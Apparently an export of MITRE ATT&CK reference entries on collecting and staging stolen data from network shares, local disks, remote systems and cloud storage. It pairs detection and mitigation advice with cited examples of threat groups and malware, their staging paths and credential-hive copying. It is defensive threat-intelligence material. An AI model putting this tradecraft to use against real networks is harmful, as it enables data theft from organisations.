Monitor executed commands and arguments for actions that could be taken to collect files from a network share. Remote access tools with built-in features may interact directly with the Windows API to gather and copy to a location. Data may also be acquired and staged through Windows system management tools such as Windows Management Instrumentation and PowerShell.
File Access
Monitor for unexpected files (i.e. .pdf, .docx, .jpg, etc.)  interacting with network shares.
Network Connection Creation
Monitor for newly constructed network connections that may search network shares on computers they have compromised to find files of interest. Network Analysis frameworks such as Zeek can be used to capture, decode, and alert on network protocols such as SMB that revolve around network shares.
Network Share Access
Monitor for unexpected and abnormal accesses to network shares.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Network Analysis frameworks such as Zeek can be used to capture, decode, and alert on network protocols such as SMB that revolve around network shares. Although there may be more native ways to detect detailed SMB events on the host, they can be extracted out of network traffic. With the right protocol decoders, port 445 traffic can be filtered and even the file path (relative to the share) can be retrieved.
Looking at this activity more closely to obtain an adequate sense of situational awareness may make it possible to detect adversaries moving between hosts in a way that deviates from normal activity. Because SMB traffic is heavy in many environments, this analytic may be difficult to turn into something that can be used to quickly detect an APT. In some cases, it may make more sense to run this analytic in a forensic fashion. Looking through and filtering its output after an intrusion has been discovered may be helpful in identifying the scope of compromise.
&lt;h4&gt;Analytic 1 - SMB Events Monitoring&lt;/h4&gt;
&lt;code&gt;smb_events = filter flow where (dest_port == "445" and protocol == "smb")
smb_events.file_name = smb_events.proto_info.file_name &lt;/code&gt;
C0015
During [C0015](https://attack.mitre.org/campaigns/C0015), the threat actors collected files from network shared drives prior to network encryption.(Citation: DFIR Conti Bazar Nov 2021)
APT28
[APT28](https://attack.mitre.org/groups/G0007) has collected files from network shared drives.(Citation: Cybersecurity Advisory GRU Brute Force Campaign July 2021)
BRONZE BUTLER
[BRONZE BUTLER](https://attack.mitre.org/groups/G0060) has exfiltrated files stolen from file shares.(Citation: Secureworks BRONZE BUTLER Oct 2017)
Chimera
[Chimera](https://attack.mitre.org/groups/G0114) has collected data of interest from network shares.(Citation: NCC Group Chimera January 2021)
Fox Kitten
[Fox Kitten](https://attack.mitre.org/groups/G0117) has searched network shares to access sensitive documents.(Citation: CISA AA20-259A Iran-Based Actor September 2020)
Gamaredon Group
[Gamaredon Group](https://attack.mitre.org/groups/G0047) malware has collected Microsoft Office documents from mapped network drives.(Citation: ESET Gamaredon June 2020)
Sowbug
[Sowbug](https://attack.mitre.org/groups/G0054) extracted Word documents from a file server on a victim network.(Citation: Symantec Sowbug Nov 2017)
menuPass
[menuPass](https://attack.mitre.org/groups/G0045) has collected data from remote systems by mounting network shares with &lt;code&gt;net use&lt;/code&gt; and using Robocopy to transfer data.(Citation: PWC Cloud Hopper April 2017)
BADNEWS
When it first starts, [BADNEWS](https://attack.mitre.org/software/S0128) crawls the victim's mapped drives and collects documents with the following extensions: .doc, .docx, .pdf, .ppt, .pptx, and .txt.(Citation: Forcepoint Monsoon)
CosmicDuke
[CosmicDuke](https://attack.mitre.org/software/S0050) steals user files from network shared drives with file extensions and keywords that match a predefined list.(Citation: F-Secure Cosmicduke)
Egregor
[Egregor](https://attack.mitre.org/software/S0554) can collect any files found in the enumerated drivers before sending it to its C2 channel.(Citation: NHS Digital Egregor Nov 2020) 
Ramsay
[Ramsay](https://attack.mitre.org/software/S0458) can collect data from network drives and stage it for exfiltration.(Citation: Eset Ramsay May 2020)	
</t>
  </si>
  <si>
    <t xml:space="preserve">Command Execution
Monitor executed commands and arguments arguments for actions that could be taken to collect and combine files. Remote access tools with built-in features may interact directly with the Windows API to gather and copy to a location. Data may also be acquired and staged through Windows system management tools such as Windows Management Instrumentation and PowerShell.
File Access
Monitor processes that appear to be reading files from disparate locations and writing them to the same directory or file may be an indication of data being staged, especially if they are suspected of performing encryption or compression on the files, such as 7zip, RAR, ZIP, or zlib.
File Creation
Monitor publicly writeable directories, central locations, and commonly used staging directories (recycle bin, temp folders, etc.) to regularly check for compressed or encrypted data that may be indicative of staging.
Windows Registry Key Modification
Consider monitoring accesses and modifications to local storage repositories (such as the Windows Registry), especially from suspicious processes that could be related to malicious data collection.
C0015
During [C0015](https://attack.mitre.org/campaigns/C0015), PowerView's file share enumeration results were stored in the file `c:\ProgramData\found_shares.txt`.(Citation: DFIR Conti Bazar Nov 2021)
C0017
During [C0017](https://attack.mitre.org/campaigns/C0017), [APT41](https://attack.mitre.org/groups/G0096) copied the local `SAM` and `SYSTEM` Registry hives to a staging directory.(Citation: Mandiant APT41)
Operation Honeybee
During [Operation Honeybee](https://attack.mitre.org/campaigns/C0006), stolen data was copied into a text file using the format `From &lt;COMPUTER-NAME&gt; (&lt;Month&gt;-&lt;Day&gt; &lt;Hour&gt;-&lt;Minute&gt;-&lt;Second&gt;).txt` prior to compression, encoding, and exfiltration.(Citation: McAfee Honeybee)
Operation Wocao
During [Operation Wocao](https://attack.mitre.org/campaigns/C0014), threat actors staged archived files in a temporary directory prior to exfiltration.(Citation: FoxIT Wocao December 2019) 
APT28
[APT28](https://attack.mitre.org/groups/G0007) has stored captured credential information in a file named pi.log.(Citation: Microsoft SIR Vol 19)
APT3
[APT3](https://attack.mitre.org/groups/G0022) has been known to stage files for exfiltration in a single location.(Citation: aptsim)
APT39
[APT39](https://attack.mitre.org/groups/G0087) has utilized tools to aggregate data prior to exfiltration.(Citation: FBI FLASH APT39 September 2020)
BackdoorDiplomacy
[BackdoorDiplomacy](https://attack.mitre.org/groups/G0135) has copied files of interest to the main drive's recycle bin.(Citation: ESET BackdoorDiplomacy Jun 2021)
Chimera
[Chimera](https://attack.mitre.org/groups/G0114) has staged stolen data locally on compromised hosts.(Citation: NCC Group Chimera January 2021)
Dragonfly
[Dragonfly](https://attack.mitre.org/groups/G0035) has created a directory named "out" in the user's %AppData% folder and copied files to it.(Citation: US-CERT TA18-074A)
FIN13
[FIN13](https://attack.mitre.org/groups/G1016) has utilized the following temporary folders on compromised Windows and Linux systems for their operations prior to exfiltration: `C:\Windows\Temp` and `/tmp`.(Citation: Mandiant FIN13 Aug 2022)(Citation: Sygnia Elephant Beetle Jan 2022)
FIN5
[FIN5](https://attack.mitre.org/groups/G0053) scripts save memory dump data into a specific directory on hosts in the victim environment.(Citation: Mandiant FIN5 GrrCON Oct 2016)
GALLIUM
[GALLIUM](https://attack.mitre.org/groups/G0093) compressed and staged files in multi-part archives in the Recycle Bin prior to exfiltration.(Citation: Cybereason Soft Cell June 2019)
Indrik Spider
[Indrik Spider](https://attack.mitre.org/groups/G0119) has stored collected date in a .tmp file.(Citation: Symantec WastedLocker June 2020)
Kimsuky
[Kimsuky](https://attack.mitre.org/groups/G0094) has staged collected data files under &lt;code&gt;C:\Program Files\Common Files\System\Ole DB\&lt;/code&gt;.(Citation: CISA AA20-301A Kimsuky)(Citation: Talos Kimsuky Nov 2021)
Lazarus Group
[Lazarus Group](https://attack.mitre.org/groups/G0032) malware IndiaIndia saves information gathered about the victim to a file that is saved in the %TEMP% directory, then compressed, encrypted, and uploaded to a C2 server.(Citation: Novetta Blockbuster)(Citation: Novetta Blockbuster Loaders)
Leviathan
[Leviathan](https://attack.mitre.org/groups/G0065) has used C:\Windows\Debug and C:\Perflogs as staging directories.(Citation: FireEye Periscope March 2018)(Citation: CISA AA21-200A APT40 July 2021)
MuddyWater
[MuddyWater](https://attack.mitre.org/groups/G0069) has stored a decoy PDF file within a victim's `%temp%` folder.(Citation: Talos MuddyWater Jan 2022)
Mustang Panda
[Mustang Panda](https://attack.mitre.org/groups/G0129) has stored collected credential files in &lt;code&gt;c:\windows\temp&lt;/code&gt; prior to exfiltration. [Mustang Panda](https://attack.mitre.org/groups/G0129) has also stored documents for exfiltration in a hidden folder on USB drives.(Citation: Secureworks BRONZE PRESIDENT December 2019)(Citation: Avira Mustang Panda January 2020)
Patchwork
[Patchwork](https://attack.mitre.org/groups/G0040) copied all targeted files to a directory called index that was eventually uploaded to the C&amp;C server.(Citation: TrendMicro Patchwork Dec 2017)
Sidewinder
[Sidewinder](https://attack.mitre.org/groups/G0121) has collected stolen files in a temporary folder in preparation for exfiltration.(Citation: ATT Sidewinder January 2021)
TEMP.Veles
[TEMP.Veles](https://attack.mitre.org/groups/G0088) has created staging folders in directories that were infrequently used by legitimate users or processes.(Citation: FireEye TRITON 2019)
TeamTNT
[TeamTNT](https://attack.mitre.org/groups/G0139) has aggregated collected credentials in text files before exfiltrating.(Citation: Cisco Talos Intelligence Group)
Threat Group-3390
[Threat Group-3390](https://attack.mitre.org/groups/G0027) has locally staged encrypted archives for later exfiltration efforts.(Citation: SecureWorks BRONZE UNION June 2017)
Volt Typhoon
[Volt Typhoon](https://attack.mitre.org/groups/G1017) has saved stolen files including the ntds.dit database and the `SYSTEM` and `SECURITY` Registry hives locally to the `C:\Windows\Temp\` directory.(Citation: Joint Cybersecurity Advisory Volt Typhoon June 2023)(Citation: Secureworks BRONZE SILHOUETTE May 2023)
Wizard Spider
[Wizard Spider](https://attack.mitre.org/groups/G0102) has staged ZIP files in local directories such as, `C:\PerfLogs\1\` and `C:\User\1\` prior to exfiltration.(Citation: Mandiant FIN12 Oct 2021)
menuPass
[menuPass](https://attack.mitre.org/groups/G0045) stages data prior to exfiltration in multi-part archives, often saved in the Recycle Bin.(Citation: PWC Cloud Hopper April 2017)
ADVSTORESHELL
[ADVSTORESHELL](https://attack.mitre.org/software/S0045) stores output from command execution in a .dat file in the %TEMP% directory.(Citation: ESET Sednit Part 2)
AppleSeed
[AppleSeed](https://attack.mitre.org/software/S0622) can stage files in a central location prior to exfiltration.(Citation: Malwarebytes Kimsuky June 2021)
Astaroth
[Astaroth](https://attack.mitre.org/software/S0373) collects data in a plaintext file named r1.log before exfiltration. (Citation: Cofense Astaroth Sept 2018)
Attor
[Attor](https://attack.mitre.org/software/S0438) has staged collected data in a central upload directory prior to exfiltration.(Citation: ESET Attor Oct 2019)
AuTo Stealer
[AuTo Stealer](https://attack.mitre.org/software/S1029) can store collected data from an infected host to a file named `Hostname_UserName.txt` prior to exfiltration.(Citation: MalwareBytes SideCopy Dec 2021)
BADNEWS
[BADNEWS](https://attack.mitre.org/software/S0128) copies documents under 15MB found on the victim system to is the user's &lt;code&gt;%temp%\SMB\&lt;/code&gt; folder. It also copies files from USB devices to a predefined directory.(Citation: Forcepoint Monsoon)(Citation: TrendMicro Patchwork Dec 2017)
BadPatch
[BadPatch](https://attack.mitre.org/software/S0337) stores collected data in log files before exfiltration.(Citation: Unit 42 BadPatch Oct 2017)
BoxCaon
[BoxCaon](https://attack.mitre.org/software/S0651) has created a working folder for collected files that it sends to the C2 server.(Citation: Checkpoint IndigoZebra July 2021) 
Calisto
[Calisto](https://attack.mitre.org/software/S0274) uses a hidden directory named .calisto to store data from the victim’s machine before exfiltration.(Citation: Securelist Calisto July 2018)(Citation: Symantec Calisto July 2018)
Carbon
[Carbon](https://attack.mitre.org/software/S0335) creates a base directory that contains the files and folders that are collected.(Citation: ESET Carbon Mar 2017)
Catchamas
[Catchamas](https://attack.mitre.org/software/S0261) stores the gathered data from the machine in .db files and .bmp files under four separate locations.(Citation: Symantec Catchamas April 2018)
Chrommme
[Chrommme](https://attack.mitre.org/software/S0667) can store captured system information locally prior to exfiltration.(Citation: ESET Gelsemium June 2021)
Crutch
[Crutch](https://attack.mitre.org/software/S0538) has staged stolen files in the &lt;code&gt;C:\AMD\Temp&lt;/code&gt; directory.(Citation: ESET Crutch December 2020)
DarkWatchman
[DarkWatchman](https://attack.mitre.org/software/S0673) can stage local data in the Windows Registry.(Citation: Prevailion DarkWatchman 2021)
Dtrack
[Dtrack](https://attack.mitre.org/software/S0567) can save collected data to disk, different file formats, and network shares.(Citation: Securelist Dtrack)(Citation: CyberBit Dtrack)
Duqu
Modules can be pushed to and executed by [Duqu](https://attack.mitre.org/software/S0038) that copy data to a staging area, compress it, and XOR encrypt it.(Citation: Symantec W32.Duqu)
DustySky
[DustySky](https://attack.mitre.org/software/S0062) created folders in temp directories to host collected files before exfiltration.(Citation: Kaspersky MoleRATs April 2019)
Dyre
[Dyre](https://attack.mitre.org/software/S0024) has the ability to create files in a TEMP folder to act as a database to store information.(Citation: Malwarebytes Dyreza November 2015)
ECCENTRICBANDWAGON
[ECCENTRICBANDWAGON](https://attack.mitre.org/software/S0593) has stored keystrokes and screenshots within the &lt;code&gt;%temp%\GoogleChrome&lt;/code&gt;, &lt;code&gt;%temp%\Downloads&lt;/code&gt;, and &lt;code&gt;%temp%\TrendMicroUpdate&lt;/code&gt; directories.(Citation: CISA EB Aug 2020)
Elise
[Elise](https://attack.mitre.org/software/S0081) creates a file in &lt;code&gt;AppData\Local\Microsoft\Windows\Explorer&lt;/code&gt; and stores all harvested data in that file.(Citation: Accenture Dragonfish Jan 2018)
Exaramel for Windows
[Exaramel for Windows](https://attack.mitre.org/software/S0343) specifies a path to store files scheduled for exfiltration.(Citation: ESET TeleBots Oct 2018) 
FLASHFLOOD
[FLASHFLOOD](https://attack.mitre.org/software/S0036) stages data it copies from the local system or removable drives in the "%WINDIR%\$NtUninstallKB885884$\" directory.(Citation: FireEye APT30)
FrameworkPOS
[FrameworkPOS](https://attack.mitre.org/software/S0503) can identifiy payment card track data on the victim and copy it to a local file in a subdirectory of C:\Windows\.(Citation: FireEye FIN6 April 2016)
FunnyDream
[FunnyDream](https://attack.mitre.org/software/S1044) can stage collected information including screen captures and logged keystrokes locally.(Citation: Bitdefender FunnyDream Campaign November 2020)
Gold Dragon
[Gold Dragon](https://attack.mitre.org/software/S0249) stores information gathered from the endpoint in a file named 1.hwp.(Citation: McAfee Gold Dragon)
Helminth
[Helminth](https://attack.mitre.org/software/S0170) creates folders to store output from batch scripts prior to sending the information to its C2 server.(Citation: Palo Alto OilRig May 2016)
InvisiMole
[InvisiMole](https://attack.mitre.org/software/S0260) determines a working directory where it stores all the gathered data about the compromised machine.(Citation: ESET InvisiMole June 2018)(Citation: ESET InvisiMole June 2020)
KGH_SPY
[KGH_SPY](https://attack.mitre.org/software/S0526) can save collected system information to a file named "info" before exfiltration.(Citation: Cybereason Kimsuky November 2020)
KOPILUWAK
[KOPILUWAK](https://attack.mitre.org/software/S1075) has piped the results from executed C2 commands to `%TEMP%\result2.dat` on the local machine.(Citation: Mandiant Suspected Turla Campaign February 2023)
Kazuar
[Kazuar](https://attack.mitre.org/software/S0265) stages command output and collected data in files before exfiltration.(Citation: Unit 42 Kazuar May 2017)
LightNeuron
[LightNeuron](https://attack.mitre.org/software/S0395) can store email data in files and directories specified in its configuration, such as &lt;code&gt;C:\Windows\ServiceProfiles\NetworkService\appdata\Local\Temp\&lt;/code&gt;.(Citation: ESET LightNeuron May 2019)
MESSAGETAP
[MESSAGETAP](https://attack.mitre.org/software/S0443) stored targeted SMS messages that matched its target list in CSV files on the compromised system.(Citation: FireEye MESSAGETAP October 2019)
MacMa
[MacMa](https://attack.mitre.org/software/S1016) has stored collected files locally before exfiltration.(Citation: Objective-See MacMa Nov 2021)
Machete
[Machete](https://attack.mitre.org/software/S0409) stores files and logs in a folder on the local drive.(Citation: ESET Machete July 2019)(Citation: Cylance Machete Mar 2017)
Mafalda
[Mafalda](https://attack.mitre.org/software/S1060) can place retrieved files into a destination directory.(Citation: SentinelLabs Metador Sept 2022)
MarkiRAT
[MarkiRAT](https://attack.mitre.org/software/S0652) can store collected data locally in a created .nfo file.(Citation: Kaspersky Ferocious Kitten Jun 2021)
Milan
[Milan](https://attack.mitre.org/software/S1015) has saved files prior to upload from a compromised host to folders beginning with the characters `a9850d2f`.(Citation: ClearSky Siamesekitten August 2021)
Mis-Type
[Mis-Type](https://attack.mitre.org/software/S0084) has temporarily stored collected information to the files `“%AppData%\{Unique Identifier}\HOSTRURKLSR”` and `“%AppData%\{Unique Identifier}\NEWERSSEMP”`.(Citation: Cylance Dust Storm)
MoonWind
[MoonWind](https://attack.mitre.org/software/S0149) saves information from its keylogging routine as a .zip file in the present working directory.(Citation: Palo Alto MoonWind March 2017)
NETWIRE
[NETWIRE](https://attack.mitre.org/software/S0198) has the ability to write collected data to a file created in the &lt;code&gt;./LOGS&lt;/code&gt; directory.(Citation: FireEye NETWIRE March 2019)
NOKKI
[NOKKI](https://attack.mitre.org/software/S0353) can collect data from the victim and stage it in &lt;code&gt;LOCALAPPDATA%\MicroSoft Updatea\uplog.tmp&lt;/code&gt;.(Citation: Unit 42 NOKKI Sept 2018)
NavRAT
[NavRAT](https://attack.mitre.org/software/S0247) writes multiple outputs to a TMP file using the &gt;&gt; method.(Citation: Talos NavRAT May 2018)
NightClub
[NightClub](https://attack.mitre.org/software/S1090) has copied captured files and keystrokes to the `%TEMP%` directory of compromised hosts.(Citation: MoustachedBouncer ESET August 2023)
ObliqueRAT
[ObliqueRAT](https://attack.mitre.org/software/S0644) can copy specific files, webcam captures, and screenshots to local directories.(Citation: Talos Oblique RAT March 2021)
Octopus
[Octopus](https://attack.mitre.org/software/S0340) has stored collected information in the Application Data directory on a compromised host.(Citation: Securelist Octopus Oct 2018)(Citation: ESET Nomadic Octopus 2018)
OopsIE
[OopsIE](https://attack.mitre.org/software/S0264) stages the output from command execution and collected files in specific folders before exfiltration.(Citation: Unit 42 OopsIE! Feb 2018)
PUNCHBUGGY
[PUNCHBUGGY](https://attack.mitre.org/software/S0196) has saved information to a random temp file before exfil.(Citation: Morphisec ShellTea June 2019)
PUNCHTRACK
[PUNCHTRACK](https://attack.mitre.org/software/S0197) aggregates collected data in a tmp file.(Citation: FireEye Know Your Enemy FIN8 Aug 2016)
PoisonIvy
[PoisonIvy](https://attack.mitre.org/software/S0012) stages collected data in a text file.(Citation: Symantec Darkmoon Aug 2005)
PowerLess
[PowerLess](https://attack.mitre.org/software/S1012) can stage stolen browser data in `C:\\Windows\\Temp\\cup.tmp` and keylogger data in `C:\\Windows\\Temp\\Report.06E17A5A-7325-4325-8E5D-E172EBA7FC5BK`.(Citation: Cybereason PowerLess February 2022)
Prikormka
[Prikormka](https://attack.mitre.org/software/S0113) creates a directory, &lt;code&gt;%USERPROFILE%\AppData\Local\SKC\&lt;/code&gt;, which is used to store collected log files.(Citation: ESET Operation Groundbait)
Pteranodon
[Pteranodon](https://attack.mitre.org/software/S0147) creates various subdirectories under &lt;code&gt;%Temp%\reports\%&lt;/code&gt; and copies files to those subdirectories. It also creates a folder at &lt;code&gt;C:\Users\&lt;Username&gt;\AppData\Roaming\Microsoft\store&lt;/code&gt; to store screenshot JPEG files.(Citation: Palo Alto Gamaredon Feb 2017)
QakBot
[QakBot](https://attack.mitre.org/software/S0650) has stored stolen emails and other data into new folders prior to exfiltration.(Citation: Kroll Qakbot June 2020)
RainyDay
[RainyDay](https://attack.mitre.org/software/S0629) can use a file exfiltration tool to copy files to &lt;code&gt;C:\ProgramData\Adobe\temp&lt;/code&gt; prior to exfiltration.(Citation: Bitdefender Naikon April 2021)
Ramsay
[Ramsay](https://attack.mitre.org/software/S0458) can stage data prior to exfiltration in &lt;code&gt;%APPDATA%\Microsoft\UserSetting&lt;/code&gt; and &lt;code&gt;%APPDATA%\Microsoft\UserSetting\MediaCache&lt;/code&gt;.(Citation: Eset Ramsay May 2020)(Citation: Antiy CERT Ramsay April 2020)	
RawPOS
Data captured by [RawPOS](https://attack.mitre.org/software/S0169) is placed in a temporary file under a directory named "memdump".(Citation: Kroll RawPOS Jan 2017)
Rover
[Rover](https://attack.mitre.org/software/S0090) copies files from removable drives to &lt;code&gt;C:\system&lt;/code&gt;.(Citation: Palo Alto Rover)
SPACESHIP
[SPACESHIP](https://attack.mitre.org/software/S0035) identifies files with certain extensions and copies them to a directory in the user's profile.(Citation: FireEye APT30)
STARWHALE
[STARWHALE](https://attack.mitre.org/software/S1037) has stored collected data in a file called `stari.txt`.(Citation: Mandiant UNC3313 Feb 2022)
SUGARDUMP
[SUGARDUMP](https://attack.mitre.org/software/S1042) has stored collected data under `%&lt;malware_execution_folder&gt;%\\CrashLog.txt`.(Citation: Mandiant UNC3890 Aug 2022)
SombRAT
[SombRAT](https://attack.mitre.org/software/S0615) can store harvested data in a custom database under the %TEMP% directory.(Citation: BlackBerry CostaRicto November 2020)
Trojan.Karagany
[Trojan.Karagany](https://attack.mitre.org/software/S0094) can create directories to store plugin output and stage data for exfiltration.(Citation: Symantec Dragonfly)(Citation: Secureworks Karagany July 2019)
Turian
[Turian](https://attack.mitre.org/software/S0647) can store copied files in a specific directory prior to exfiltration.(Citation: ESET BackdoorDiplomacy Jun 2021)
USBStealer
[USBStealer](https://attack.mitre.org/software/S0136) collects files matching certain criteria from the victim and stores them in a local directory for later exfiltration.(Citation: ESET Sednit USBStealer 2014)(Citation: Kaspersky Sofacy)
Ursnif
[Ursnif](https://attack.mitre.org/software/S0386) has used tmp files to stage gathered information.(Citation: TrendMicro Ursnif Mar 2015)
Zebrocy
[Zebrocy](https://attack.mitre.org/software/S0251) stores all collected information in a single file before exfiltration.(Citation: ESET Zebrocy Nov 2018)
ccf32
[ccf32](https://attack.mitre.org/software/S1043) can temporarily store files in a hidden directory on the local host.(Citation: Bitdefender FunnyDream Campaign November 2020)
metaMain
[metaMain](https://attack.mitre.org/software/S1059) has stored the collected system files in a working directory.(Citation: SentinelLabs Metador Sept 2022)(Citation: SentinelLabs Metador Technical Appendix Sept 2022)
</t>
  </si>
  <si>
    <t xml:space="preserve">Command Execution
Monitor executed commands and arguments arguments for actions that could be taken to collect and combine files. Remote access tools with built-in features may interact directly with the Windows API to gather and copy to a location. Data may also be acquired and staged through Windows system management tools such as Windows Management Instrumentation and PowerShell.
File Access
Monitor processes that appear to be reading files from disparate locations and writing them to the same directory or file may be an indication of data being staged, especially if they are suspected of performing encryption or compression on the files, such as 7zip, RAR, ZIP, or zlib.
File Creation
Monitor publicly writeable directories, central locations, and commonly used staging directories (recycle bin, temp folders, etc.) to regularly check for compressed or encrypted data that may be indicative of staging.
Night Dragon
During [Night Dragon](https://attack.mitre.org/campaigns/C0002), threat actors copied files to company web servers and subsequently downloaded them.(Citation: McAfee Night Dragon)
SolarWinds Compromise
During the [SolarWinds Compromise](https://attack.mitre.org/campaigns/C0024), [APT29](https://attack.mitre.org/groups/G0016) staged data and files in password-protected archives on a victim's OWA server.(Citation: Volexity SolarWinds)
APT28
[APT28](https://attack.mitre.org/groups/G0007) has staged archives of collected data on a target's Outlook Web Access (OWA) server.(Citation: Cybersecurity Advisory GRU Brute Force Campaign July 2021)
Chimera
[Chimera](https://attack.mitre.org/groups/G0114) has staged stolen data on designated servers in the target environment.(Citation: NCC Group Chimera January 2021)
FIN6
[FIN6](https://attack.mitre.org/groups/G0037) actors have compressed data from remote systems and moved it to another staging system before exfiltration.(Citation: FireEye FIN6 April 2016)
FIN8
[FIN8](https://attack.mitre.org/groups/G0061) aggregates staged data from a network into a single location.(Citation: FireEye Know Your Enemy FIN8 Aug 2016)
Leviathan
[Leviathan](https://attack.mitre.org/groups/G0065) has staged data remotely prior to exfiltration.(Citation: CISA AA21-200A APT40 July 2021)
MoustachedBouncer
[MoustachedBouncer](https://attack.mitre.org/groups/G1019) has used plugins to save captured screenshots to `.\AActdata\` on an SMB share.(Citation: MoustachedBouncer ESET August 2023)
Threat Group-3390
[Threat Group-3390](https://attack.mitre.org/groups/G0027) has moved staged encrypted archives to Internet-facing servers that had previously been compromised with [China Chopper](https://attack.mitre.org/software/S0020) prior to exfiltration.(Citation: SecureWorks BRONZE UNION June 2017)
menuPass
[menuPass](https://attack.mitre.org/groups/G0045) has staged data on remote MSP systems or other victim networks prior to exfiltration.(Citation: PWC Cloud Hopper April 2017)(Citation: Symantec Cicada November 2020)
ccf32
[ccf32](https://attack.mitre.org/software/S1043) has copied files to a remote machine infected with [Chinoxy](https://attack.mitre.org/software/S1041) or another backdoor.(Citation: Bitdefender FunnyDream Campaign November 2020)
</t>
  </si>
  <si>
    <t xml:space="preserve">Cloud Storage Access
Monitor for unusual queries to the cloud provider's storage service. Activity originating from unexpected sources may indicate improper permissions are set and are allowing access to data. Additionally, detecting failed attempts by a user for a certain object, followed by escalation of privileges by the same user, and access to the same object may be an indication of suspicious activity.
Audit
Frequently check permissions on cloud storage to ensure proper permissions are set to deny open or unprivileged access to resources.(Citation: Amazon S3 Security, 2019)
Encrypt Sensitive Information
Encrypt data stored at rest in cloud storage.(Citation: Amazon S3 Security, 2019)(Citation: Microsoft Azure Storage Security, 2019) Managed encryption keys can be rotated by most providers. At a minimum, ensure an incident response plan to storage breach includes rotating the keys and test for impact on client applications.(Citation: Google Cloud Encryption Key Rotation)
Filter Network Traffic
Cloud service providers support IP-based restrictions when accessing cloud resources. Consider using IP allowlisting along with user account management to ensure that data access is restricted not only to valid users but only from expected IP ranges to mitigate the use of stolen credentials to access data.
Multi-factor Authentication
Consider using multi-factor authentication to restrict access to resources and cloud storage APIs.(Citation: Amazon S3 Security, 2019)
Restrict File and Directory Permissions
Use access control lists on storage systems and objects.
User Account Management
Configure user permissions groups and roles for access to cloud storage.(Citation: Microsoft Azure Storage Security, 2019) Implement strict Identity and Access Management (IAM) controls to prevent access to storage solutions except for the applications, users, and services that require access.(Citation: Amazon S3 Security, 2019) Ensure that temporary access tokens are issued rather than permanent credentials, especially when access is being granted to entities outside of the internal security boundary.(Citation: Amazon  AWS Temporary Security Credentials)
C0027
During [C0027](https://attack.mitre.org/campaigns/C0027), [Scattered Spider](https://attack.mitre.org/groups/G1015) accessed victim OneDrive environments to search for VPN and MFA enrollment information, help desk instructions, and new hire guides.(Citation: Crowdstrike TELCO BPO Campaign December 2022)
Fox Kitten
[Fox Kitten](https://attack.mitre.org/groups/G0117) has obtained files from the victim's cloud storage instances.(Citation: CISA AA20-259A Iran-Based Actor September 2020)
AADInternals
AADInternals can collect files from a user’s OneDrive.(Citation: AADInternals)
Pacu
[Pacu](https://attack.mitre.org/software/S1091) can enumerate and download files stored in AWS storage services, such as S3 buckets.(Citation: GitHub Pacu)
Peirates
[Peirates](https://attack.mitre.org/software/S0683) can dump the contents of AWS S3 buckets. It can also retrieve service account tokens from kOps buckets in Google Cloud Storage or S3.(Citation: Peirates GitHub)
</t>
  </si>
  <si>
    <t xml:space="preserve">Command Execution
Monitor executed commands and arguments arguments for actions that could be taken to collect and combine files. Remote access tools with built-in features may interact directly with the Windows API to gather and copy to a location. Data may also be acquired and staged through Windows system management tools such as Windows Management Instrumentation and PowerShell.
File Access
Monitor processes that appear to be reading files from disparate locations and writing them to the same directory or file may be an indication of data being staged, especially if they are suspected of performing encryption or compression on the files, such as 7zip, RAR, ZIP, or zlib.
File Creation
Monitor publicly writeable directories, central locations, and commonly used staging directories (recycle bin, temp folders, etc.) to regularly check for compressed or encrypted data that may be indicative of staging.
Windows Registry Key Modification
Consider monitoring accesses and modifications to local storage repositories (such as the Windows Registry), especially from suspicious processes that could be related to malicious data collection.
Volt Typhoon
[Volt Typhoon](https://attack.mitre.org/groups/G1017) has staged collected data in password-protected archives.(Citation: Microsoft Volt Typhoon May 2023)
Wizard Spider
[Wizard Spider](https://attack.mitre.org/groups/G0102) has collected and staged credentials and network enumeration information, using  the networkdll and psfin [TrickBot](https://attack.mitre.org/software/S0266) modules.(Citation: CrowdStrike Grim Spider May 2019)
Kevin
[Kevin](https://attack.mitre.org/software/S1020) can create directories to store logs and other collected data.(Citation: Kaspersky Lyceum October 2021)
Kobalos
[Kobalos](https://attack.mitre.org/software/S0641) can write captured SSH connection credentials to a file under the &lt;code&gt;/var/run&lt;/code&gt; directory with a &lt;code&gt;.pid&lt;/code&gt; extension for exfiltration.(Citation: ESET Kobalos Jan 2021) 
QUIETCANARY
[QUIETCANARY](https://attack.mitre.org/software/S1076) has the ability to stage data prior to exfiltration.(Citation: Mandiant Suspected Turla Campaign February 2023)
Shark
[Shark](https://attack.mitre.org/software/S1019) has stored information in folders named `U1` and `U2` prior to exfiltration.(Citation: ClearSky Siamesekitten August 2021)
</t>
  </si>
  <si>
    <t xml:space="preserve">Command Execution
Monitor executed commands and arguments for actions that could be taken to collect internal data.
File Access
Monitor for unexpected files (e.g., .pdf, .docx, .jpg, etc.) viewed for collecting internal data.
Script Execution
Monitor for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Encrypt Sensitive Information
Encryption and off-system storage of sensitive information may be one way to mitigate collection of files, but may not stop an adversary from acquiring the information if an intrusion persists over a long period of time and the adversary is able to discover and access the data through other means. Strong passwords should be used on certain encrypted documents that use them to prevent offline cracking through [Brute Force](https://attack.mitre.org/techniques/T1110) techniques.
Remote Data Storage
Encryption and off-system storage of sensitive information may be one way to mitigate collection of files, but may not stop an adversary from acquiring the information if an intrusion persists over a long period of time and the adversary is able to discover and access the data through other means.
Frankenstein
During [Frankenstein](https://attack.mitre.org/campaigns/C0001), the threat actors used [Empire](https://attack.mitre.org/software/S0363) to automatically gather the username, domain name, machine name, and other system information.(Citation: Talos Frankenstein June 2019)
Operation Wocao
During [Operation Wocao](https://attack.mitre.org/campaigns/C0014), threat actors used a script to collect information about the infected system.(Citation: FoxIT Wocao December 2019)
APT1
[APT1](https://attack.mitre.org/groups/G0006) used a batch script to perform a series of discovery techniques and saves it to a text file.(Citation: Mandiant APT1)
APT28
[APT28](https://attack.mitre.org/groups/G0007) used a publicly available tool to gather and compress multiple documents on the DCCC and DNC networks.(Citation: DOJ GRU Indictment Jul 2018)
Chimera
[Chimera](https://attack.mitre.org/groups/G0114) has used custom DLLs for continuous retrieval of data from memory.(Citation: NCC Group Chimera January 2021)
Confucius
[Confucius](https://attack.mitre.org/groups/G0142) has used a file stealer to steal documents and images with the following extensions: txt, pdf, png, jpg, doc, xls, xlm, odp, ods, odt, rtf, ppt, xlsx, xlsm, docx, pptx, and jpeg.(Citation: TrendMicro Confucius APT Aug 2021)
FIN5
[FIN5](https://attack.mitre.org/groups/G0053) scans processes on all victim systems in the environment and uses automated scripts to pull back the results.(Citation: Mandiant FIN5 GrrCON Oct 2016)
FIN6
